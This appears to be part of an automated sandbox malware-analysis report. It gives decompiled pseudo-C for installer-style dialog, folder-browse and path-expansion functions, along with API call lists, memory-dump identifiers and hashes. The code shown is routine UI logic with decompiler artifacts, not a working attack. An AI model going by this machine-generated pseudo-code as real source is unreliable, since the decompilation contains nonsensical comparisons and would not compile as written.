                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                                                                                                                            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                                                                                                                                                            						_a16 = _t94;
                                                                                                                                                                                                                            						if(_t94 != 0) {
                                                                                                                                                                                                                            							_t128 = _a8;
                                                                                                                                                                                                                            							_v32.left = 0x10;
                                                                                                                                                                                                                            							_v32.top = 8;
                                                                                                                                                                                                                            							SetBkMode(_t128, 1);
                                                                                                                                                                                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                                                                                                                            							_a8 = SelectObject(_t128, _a16);
                                                                                                                                                                                                                            							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                                                                                                                                                                                            							SelectObject(_t128, _a8);
                                                                                                                                                                                                                            							DeleteObject(_a16);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					EndPaint(_a4,  &_v96);
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t102 = _a16;
                                                                                                                                                                                                                            				if(_a8 == 0x46) {
                                                                                                                                                                                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                            • FillRect.USER32 ref: 004010E4
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                            • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                                                                                                                            • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720; // 0x68b77c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
                                                                                                                                                                                                                            						_t186 = _a8 - 0x405;
                                                                                                                                                                                                                            						if(_a8 != 0x405) {
                                                                                                                                                                                                                            							goto L53;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t118 = _a12 & 0x0000ffff;
                                                                                                                                                                                                                            					if(_t118 != 0x3fb) {
                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                            						if(_t118 == 0x3e9) {
                                                                                                                                                                                                                            							_t152 = 7;
                                                                                                                                                                                                                            							memset( &_v76, 0, _t152 << 2);
                                                                                                                                                                                                                            							_v80 = _t167;
                                                                                                                                                                                                                            							_v72 = 0x423748;
                                                                                                                                                                                                                            							_v60 = E00404E0B;
                                                                                                                                                                                                                            							_v56 = _t146;
                                                                                                                                                                                                                            							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                                                                                                                                                                                            							_t122 =  &_v80;
                                                                                                                                                                                                                            							_v64 = 0x41;
                                                                                                                                                                                                                            							__imp__SHBrowseForFolderW(_t122);
                                                                                                                                                                                                                            							if(_t122 == 0) {
                                                                                                                                                                                                                            								_a8 = 0x40f;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								__imp__CoTaskMemFree(_t122);
                                                                                                                                                                                                                            								E00405F37(_t146);
                                                                                                                                                                                                                            								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                                                                                                                                                                                            								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                                                                                                                                                                                            									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                                                                                                                                                                                            									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                                                                                                                                                                                            										lstrcatW(_t146, 0x428200);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								 *0x423738 =  *0x423738 + 1;
                                                                                                                                                                                                                            								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_a12 >> 0x10 != 0x300) {
                                                                                                                                                                                                                            						goto L53;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_a8 = 0x40f;
                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                                                                                                                                                            					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                                                                                                                                                                                            						E00405F37(_t146);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *0x429238 = _t167;
                                                                                                                                                                                                                            					SetWindowTextW(_t166, _t146);
                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					E004045C4(_t167);
                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                                                                            					_push(0x14);
                                                                                                                                                                                                                            					E004045C4(_t167);
                                                                                                                                                                                                                            					E004045F9(_t166);
                                                                                                                                                                                                                            					_t138 = E00406A35(8);
                                                                                                                                                                                                                            					if(_t138 == 0) {
                                                                                                                                                                                                                            						L53:
                                                                                                                                                                                                                            						return E0040462B(_a8, _a12, _a16);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *_t138(_t166, 1);
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













































                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404cd4
                                                                                                                                                                                                                            0x00404d31
                                                                                                                                                                                                                            0x00404d3b
                                                                                                                                                                                                                            0x00404d3e
                                                                                                                                                                                                                            0x00404d41
                                                                                                                                                                                                                            0x00404d48
                                                                                                                                                                                                                            0x00404d48
                                                                                                                                                                                                                            0x00404d4a
                                                                                                                                                                                                                            0x00404d4a
                                                                                                                                                                                                                            0x00404d4f
                                                                                                                                                                                                                            0x00404d51
                                                                                                                                                                                                                            0x00404d59
                                                                                                                                                                                                                            0x00404d60
                                                                                                                                                                                                                            0x00404d62
                                                                                                                                                                                                                            0x00404d6d
                                                                                                                                                                                                                            0x00404d6d
                                                                                                                                                                                                                            0x00404d62
                                                                                                                                                                                                                            0x00404d7d
                                                                                                                                                                                                                            0x00404d87
                                                                                                                                                                                                                            0x00404d8f
                                                                                                                                                                                                                            0x00404daa
                                                                                                                                                                                                                            0x00404d91
                                                                                                                                                                                                                            0x00404d9a
                                                                                                                                                                                                                            0x00404d9a
                                                                                                                                                                                                                            0x00404d8f
                                                                                                                                                                                                                            0x00404daf
                                                                                                                                                                                                                            0x00404db4
                                                                                                                                                                                                                            0x00404db9
                                                                                                                                                                                                                            0x00404dc2
                                                                                                                                                                                                                            0x00404dc2
                                                                                                                                                                                                                            0x00404dcb
                                                                                                                                                                                                                            0x00404dcd
                                                                                                                                                                                                                            0x00404dcd
                                                                                                                                                                                                                            0x00404dd9
                                                                                                                                                                                                                            0x00404de1
                                                                                                                                                                                                                            0x00404deb
                                                                                                                                                                                                                            0x00404deb
                                                                                                                                                                                                                            0x00404df0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404df0
                                                                                                                                                                                                                            0x00404c9a
                                                                                                                                                                                                                            0x00404c51
                                                                                                                                                                                                                            0x00404c58
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404c58
                                                                                                                                                                                                                            0x00404b77
                                                                                                                                                                                                                            0x00404b80
                                                                                                                                                                                                                            0x00404b9a
                                                                                                                                                                                                                            0x00404b9f
                                                                                                                                                                                                                            0x00404ba9
                                                                                                                                                                                                                            0x00404bb0
                                                                                                                                                                                                                            0x00404bbc
                                                                                                                                                                                                                            0x00404bbf
                                                                                                                                                                                                                            0x00404bc2
                                                                                                                                                                                                                            0x00404bc9
                                                                                                                                                                                                                            0x00404bd1
                                                                                                                                                                                                                            0x00404bd4
                                                                                                                                                                                                                            0x00404bd8
                                                                                                                                                                                                                            0x00404bdf
                                                                                                                                                                                                                            0x00404be7
                                                                                                                                                                                                                            0x00404c41
                                                                                                                                                                                                                            0x00404be9
                                                                                                                                                                                                                            0x00404bea
                                                                                                                                                                                                                            0x00404bf1
                                                                                                                                                                                                                            0x00404bfb
                                                                                                                                                                                                                            0x00404c03
                                                                                                                                                                                                                            0x00404c10
                                                                                                                                                                                                                            0x00404c24
                                                                                                                                                                                                                            0x00404c28
                                                                                                                                                                                                                            0x00404c28
                                                                                                                                                                                                                            0x00404c24
                                                                                                                                                                                                                            0x00404c2d
                                                                                                                                                                                                                            0x00404c3a
                                                                                                                                                                                                                            0x00404c3a
                                                                                                                                                                                                                            0x00404be7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404b9f
                                                                                                                                                                                                                            0x00404b8d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404b93
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404afe
                                                                                                                                                                                                                            0x00404b0b
                                                                                                                                                                                                                            0x00404b14
                                                                                                                                                                                                                            0x00404b21
                                                                                                                                                                                                                            0x00404b21
                                                                                                                                                                                                                            0x00404b28
                                                                                                                                                                                                                            0x00404b2e
                                                                                                                                                                                                                            0x00404b37
                                                                                                                                                                                                                            0x00404b3a
                                                                                                                                                                                                                            0x00404b3d
                                                                                                                                                                                                                            0x00404b45
                                                                                                                                                                                                                            0x00404b48
                                                                                                                                                                                                                            0x00404b4b
                                                                                                                                                                                                                            0x00404b51
                                                                                                                                                                                                                            0x00404b58
                                                                                                                                                                                                                            0x00404b5f
                                                                                                                                                                                                                            0x00404df6
                                                                                                                                                                                                                            0x00404e08
                                                                                                                                                                                                                            0x00404b65
                                                                                                                                                                                                                            0x00404b68
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404b68
                                                                                                                                                                                                                            0x00404b5f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404B04
                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                                                                                                                                                                                            • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                                                                                                                                                                              • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                                                                                                                                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                                                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                                                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                                                                                                                              • Part of subcall function 004068EF: CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                                                                                                                                              • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                                                                                                                                              • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                                                                                                                                              • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp$Call$H7B
                                                                                                                                                                                                                            • API String ID: 2624150263-521110912
                                                                                                                                                                                                                            • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                                                                                                                                                            • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                                                                                                                                                            				struct _ITEMIDLIST* _v8;
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                            				WCHAR* _t45;
                                                                                                                                                                                                                            				signed char _t47;
                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                            				short _t59;
                                                                                                                                                                                                                            				short _t61;
                                                                                                                                                                                                                            				short _t63;
                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                                                                            				short _t81;
                                                                                                                                                                                                                            				short _t82;
                                                                                                                                                                                                                            				signed char _t84;
                                                                                                                                                                                                                            				signed int _t85;
                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                            				intOrPtr* _t105;
                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                            				WCHAR* _t108;
                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t107 = __esi;
                                                                                                                                                                                                                            				_t104 = __edi;
                                                                                                                                                                                                                            				_t71 = __ebx;
                                                                                                                                                                                                                            				_t44 = _a8;
                                                                                                                                                                                                                            				if(_t44 < 0) {
                                                                                                                                                                                                                            					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t71);
                                                                                                                                                                                                                            				_push(_t107);
                                                                                                                                                                                                                            				_push(_t104);
                                                                                                                                                                                                                            				_t105 =  *0x42a298 + _t44 * 2;
                                                                                                                                                                                                                            				_t45 = 0x428200;
                                                                                                                                                                                                                            				_t108 = 0x428200;
                                                                                                                                                                                                                            				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                                                                                                                                                                                            					_t108 = _a4;
                                                                                                                                                                                                                            					_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t81 =  *_t105;
                                                                                                                                                                                                                            				_a8 = _t81;
                                                                                                                                                                                                                            				if(_t81 == 0) {
                                                                                                                                                                                                                            					L43:
                                                                                                                                                                                                                            					 *_t108 =  *_t108 & 0x00000000;
                                                                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                                                                            						return _t45;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return E00406668(_a4, _t45);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                                                                                                                                                            						_t98 = 2;
                                                                                                                                                                                                                            						_t105 = _t105 + _t98;
                                                                                                                                                                                                                            						if(_t81 >= 4) {
                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                            								 *_t108 = _t81;
                                                                                                                                                                                                                            								_t108 = _t108 + _t98;
                                                                                                                                                                                                                            								__eflags = _t108;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *_t108 =  *_t105;
                                                                                                                                                                                                                            								_t108 = _t108 + _t98;
                                                                                                                                                                                                                            								_t105 = _t105 + _t98;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L42:
                                                                                                                                                                                                                            							_t82 =  *_t105;
                                                                                                                                                                                                                            							_a8 = _t82;
                                                                                                                                                                                                                            							if(_t82 != 0) {
                                                                                                                                                                                                                            								_t81 = _a8;
                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L43;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                                                                                                                                                            						_t47 =  *_t105;
                                                                                                                                                                                                                            						_t48 = _t47 & 0x000000ff;
                                                                                                                                                                                                                            						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                                                                                                                                                            						_t85 = _t84 & 0x000000ff;
                                                                                                                                                                                                                            						_v28 = _t48 | 0x00008000;
                                                                                                                                                                                                                            						_t77 = 2;
                                                                                                                                                                                                                            						_v16 = _t85;
                                                                                                                                                                                                                            						_t105 = _t105 + _t77;
                                                                                                                                                                                                                            						_v24 = _t48;
                                                                                                                                                                                                                            						_v20 = _t85 | 0x00008000;
                                                                                                                                                                                                                            						if(_a8 != _t77) {
                                                                                                                                                                                                                            							__eflags = _a8 - 3;
                                                                                                                                                                                                                            							if(_a8 != 3) {
                                                                                                                                                                                                                            								__eflags = _a8 - 1;
                                                                                                                                                                                                                            								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

                                                                                                                                                                                                                            0x00406761
                                                                                                                                                                                                                            0x00406764
                                                                                                                                                                                                                            0x00406857
                                                                                                                                                                                                                            0x0040685c
                                                                                                                                                                                                                            0x0040688f
                                                                                                                                                                                                                            0x00406894
                                                                                                                                                                                                                            0x00406899
                                                                                                                                                                                                                            0x0040689e
                                                                                                                                                                                                                            0x0040689e
                                                                                                                                                                                                                            0x004068a3
                                                                                                                                                                                                                            0x004068a9
                                                                                                                                                                                                                            0x004068ac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004068ac
                                                                                                                                                                                                                            0x0040685e
                                                                                                                                                                                                                            0x00406861
                                                                                                                                                                                                                            0x00406864
                                                                                                                                                                                                                            0x00406879
                                                                                                                                                                                                                            0x00406880
